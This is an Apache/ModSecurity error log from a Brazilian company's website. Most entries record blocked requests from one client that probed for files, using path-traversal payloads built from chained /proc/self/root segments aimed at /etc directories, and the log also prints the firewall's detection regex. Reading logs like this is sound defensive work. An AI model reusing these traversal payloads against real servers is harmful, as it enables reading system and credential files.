[Fri Mar 20 03:26:07.085252 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:51816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzof_qxLDW4GITHUkSvVwAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:26:19.057785 2026] [proxy_fcgi:error] [pid 8732:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57892] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:26:22.543050 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.243.128:59922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzojjJ3M9BSuKP7CAbcagAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:26:26.514189 2026] [mime_magic:error] [pid 11642:tid 140411691570944] (70014)End of file found: [client 57.141.18.35:38758] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:26:36.748154 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.243.128:50710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzonBCii7xarUs8iHYxNQAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:26:44.666529 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:49766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzopPu8EFLIOrSqIpvsDwAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:26:45.429798 2026] [proxy_fcgi:error] [pid 30424:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:59160] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:26:52.842315 2026] [:error] [pid 11167:tid 140411540502272] [client 74.7.243.128:47278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzorPHIg5MgXLBnicPJbwAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:27:07.125792 2026] [proxy_fcgi:error] [pid 9818:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:60238] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:27:16.846295 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:37814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzoxPXLqtnMIWvjpaJmVgAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:27:24.312554 2026] [mime_magic:error] [pid 11642:tid 140411557287680] (70014)End of file found: [client 57.141.18.13:40608] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:27:30.137790 2026] [proxy_fcgi:error] [pid 30077:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33152] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:27:51.141965 2026] [proxy_fcgi:error] [pid 7893:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34270] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:27:53.673044 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:37336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzo6da6ubjKNq_cu4abtwAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:27:57.668344 2026] [:error] [pid 11642:tid 140411632822016] [client 74.7.243.128:41624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzo7bninkcc-iUj5AorSAAAA40"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:28:09.405645 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.243.128:50756] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzo-QF0L0L-SsrnPo41GgAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:28:13.041867 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35342] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:28:26.383845 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.243.128:50018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpCvu8EFLIOrSqIpvsQAAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:28:30.935042 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:33350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpDta6ubjKNq_cu4abxgAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:28:35.193829 2026] [proxy_fcgi:error] [pid 9818:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36426] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:28:40.957453 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:33360] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpGOoXxyEfFpUF8f9RUgAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:28:48.158904 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:48386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpIDJ3M9BSuKP7CAbcwQAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:28:52.543125 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.243.128:52230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpJPHIg5MgXLBnicPJmgAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:28:59.749799 2026] [proxy_fcgi:error] [pid 11642:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:37528] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:29:00.329578 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:52238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpLPu8EFLIOrSqIpvsSwAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:02.961792 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.243.128:37068] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpLvXLqtnMIWvjpaJmeQAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:03.411952 2026] [core:alert] [pid 9818:tid 140411582465792] [client 57.141.18.108:44302] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 03:29:05.039112 2026] [:error] [pid 11642:tid 140411641214720] [client 74.7.243.128:37080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpMbninkcc-iUj5AorXQAAA4w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:07.218284 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:37092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpMxCii7xarUs8iHYxZwAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:10.564096 2026] [:error] [pid 8307:tid 140411674785536] [client 74.7.243.128:37094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpNr-FhjpZGs9ba8qx3QAAAwg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:13.123370 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:35460] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpOTJ3M9BSuKP7CAbc1AAAAJQ"], referer: 